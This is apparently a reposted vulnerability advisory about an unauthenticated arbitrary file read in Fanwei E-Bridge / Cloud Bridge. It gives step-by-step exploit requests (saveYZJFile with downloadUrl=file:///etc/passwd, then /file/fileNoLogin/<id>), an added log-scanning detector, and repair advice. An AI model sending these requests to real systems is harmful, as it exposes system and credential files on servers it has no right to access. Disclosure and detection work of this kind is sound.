Fanwei OA Cloud Bridge unauthorized arbitrary file read

0x00 Vulnerability description

E-Bridge is system integration middleware developed by Shanghai e-Bridge against the background of "Internet+" to bridge open Internet resources and enterprise information systems. Fanwei Cloud Bridge has an arbitrary file read vulnerability. An attacker who successfully exploits it can read arbitrary files and obtain sensitive information.

0x01 Affected version

Multiple versions from 2018-2019.

0x02 Vulnerability reproduction

Step 1: Request /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt; the response contains an id string

Step 2: Use the id value to retrieve the file content (/file/fileNoLogin/id)

1. Request /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt; the response reports that there is no such file or directory. Since Linux is case sensitive, this indicates that the target is running Linux

2. Request /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt; the response contains an id

3. Access /file/fileNoLogin/id through the file view interface

4. When the downloadUrl parameter is set to the absolute path of a directory, it results in directory traversal
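
A defender can look for the two requests described above in web access logs. The following is an added example, not code from the original post: it assumes logs in common/combined format, and the names scan and SAMPLE_LOG, the IP addresses and the ids are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Prefix of the common/combined access-log format: client IP and request target.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*"')

# Constructed sample lines (documentation IPs, placeholder ids), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2021:10:00:00 +0000] "GET /wxjsapi/saveYZJFile'
    '?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1" 200 120',
    '203.0.113.7 - - [01/Jan/2021:10:00:02 +0000] '
    '"GET /file/fileNoLogin/EXAMPLEID0001 HTTP/1.1" 200 1843',
    '198.51.100.9 - - [01/Jan/2021:10:01:00 +0000] "GET /wxjsapi/saveYZJFile'
    '?fileName=a&downloadUrl=https://files.example.com/a.txt&fileExt=txt HTTP/1.1" 200 118',
    '198.51.100.9 - - [01/Jan/2021:10:01:03 +0000] '
    '"GET /file/fileNoLogin/EXAMPLEID0002 HTTP/1.1" 200 50',
]


def scan(lines):
    """Return findings as (client_ip, kind, detail) tuples, in log order."""
    findings = []
    primed = set()  # clients that already sent a file: downloadUrl
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        ip, url = m["ip"], urlsplit(m["target"])
        path = url.path.lower()
        if path.endswith("/wxjsapi/saveyzjfile"):
            # parse_qs percent-decodes values, so file%3A%2F%2F is caught too.
            params = {k.lower(): v for k, v in parse_qs(url.query).items()}
            for value in params.get("downloadurl", []):
                if value.strip().lower().startswith("file:"):
                    primed.add(ip)
                    findings.append((ip, "local-file-save", value))
        elif "/file/filenologin/" in path and ip in primed:
            # Same client retrieving a stored file without logging in.
            file_id = url.path.rsplit("/", 1)[-1]
            findings.append((ip, "unauth-fetch-after-save", file_id))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Any local-file-save finding is worth investigating on its own; the paired fetch shows which stored id was then retrieved.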

0x03 Repair suggestions

1. Disable the application route /file/fileNoLogin

2. Upgrade to the latest version

Please credit the source when reposting: Adminxe's Blog » Fanwei OA Cloud Bridge unauthorized arbitrary file read

Origin blog.csdn.net/Adminxe/article/details/108744909